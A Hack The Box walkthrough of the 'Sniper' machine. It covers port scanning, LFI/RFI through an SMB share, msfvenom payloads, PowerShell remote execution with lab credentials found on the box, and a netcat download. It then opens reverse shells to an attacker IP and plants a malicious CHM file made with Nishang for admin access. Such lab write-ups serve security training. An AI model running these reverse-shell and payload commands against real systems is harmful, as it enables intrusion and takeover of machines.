19. Hack The Box. Level Medium: Sniper Walkthrough. RFI and a Malicious CHM Document

19 December 2024 5 minutes Author: Lady Liberty

If you are interested in penetration testing or want to improve your ethical hacking skills, Hack The Box’s Sniper Virtual Machine is a great challenge for you. In this article, we will take a detailed look at the entire process, from the Recon phase to escalating privileges to the admin level.

Sniper walkthrough using RFI and a malicious CHM document

Continuing the publication of solutions to problems submitted for development from the HackTheBox platform. This material may be useful for those who seek to develop in the field of information security. The article discusses the exploitation of RFI, bypassing the meterpreter shell blocking and creating a malicious CHM document.

Connection to the laboratory is via VPN. It is recommended to avoid using a work computer or devices with important data, since the connection is to a private network where experienced information security specialists are located.

Recon

This machine has the IP address 10.10.10.151, which we add to /etc/hosts.

10.10.10.151    sniper.htb
First, a scan of open ports is performed. To avoid the lengthy process of checking all ports with nmap, masscan is used for the initial scan. This tool scans all TCP and UDP ports through the tun0 interface at a rate of 1000 packets per second.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.151 --rate=1000

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A sniper.htb -p80,135,139,445

There are 4 ports open on the host, let’s find out what the web server can give us.

The first three links are empty, but the other two led to the blog and authorization pages.

Immediately, assumptions about the possibility of using LFI (Local File Inclusion) appear. To test this vulnerability, it is suggested to read one of the system files available for viewing, for example, hosts (this file exists in both Linux and Windows).

The assumption was confirmed — LFI (Local File Inclusion) was detected.

Entry Point

In addition, there is a chance to test the possibility of using RFI (Remote File Inclusion). To do this, a test file is created that will be used for further research into the vulnerability.

To deploy a local SAMBA SMB server, you need to make the appropriate configurations to the /etc/samba/smb.conf file. In the configuration, you need to specify the path to the desired directory and grant permissions for access on behalf of the guest.

Start the smbd service.

service smbd start

And by turning to the resource, we will get a positive result.

Now we’re going to throw in the load. We’ll create it using msfvenom, then activate the listener.

We access the file. And we get a connection.

Since the site has an authorization page, there is a possibility to find at least some credentials. The current location is the blog page directory.

We download everything that is in the user directory.

While browsing all files on the local host, database connection credentials were discovered.

USER

To determine the users on the system, the appropriate commands were attempted. However, when executing any command through meterpreter, the connection is interrupted. This may indicate that the cmd command processor is blocked, in particular the (-a) parameter.

execute -f powershell -a "net users" -i -H

Now let’s try to execute the command in the context of this user. To do this, we will pass the following script to powershell as a parameter.

execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { whoami }" -i -H

Let’s download netcat to the host. To do this, we’ll start an HTTP server in the directory with it.

python3 -m http.server 80

Let’s download.

execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { iwr 10.10.15.55/nc -o C:\\Users\\Chris\\Documents\\nc.exe }" -i -H

Now we run netcat, connect, and get a user session.

execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 6543}" -i -H

ROOT

After some searching through the directories, a file in CHM format was discovered. Its purpose remains unclear at this stage.

A note was found in the Docs folder on drive C: stating that the user has no PHP skills and should prepare documentation. The documents should be left in the same folder.

To create a malicious CHM file, HTML Help Workshop is first installed, and then the Out-Chm utility from the Nishang package is used to generate the required file.

Out-CHM -Payload "C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 8765" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Saving the created file to the target directory on the remote host completes successfully.

wget http://10.10.15.55/doc.chm -o C:\Docs\doc.chm

The result is a session with administrator rights.

Conclusion

The article describes the Sniper VM walkthrough on the Hack The Box platform, including the detection and exploitation of LFI and RFI vulnerabilities, bypassing shell blocking, and creating a malicious CHM file for privilege escalation. The article emphasizes the importance of properly securing servers, configuring file access, and verifying the security of web applications.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.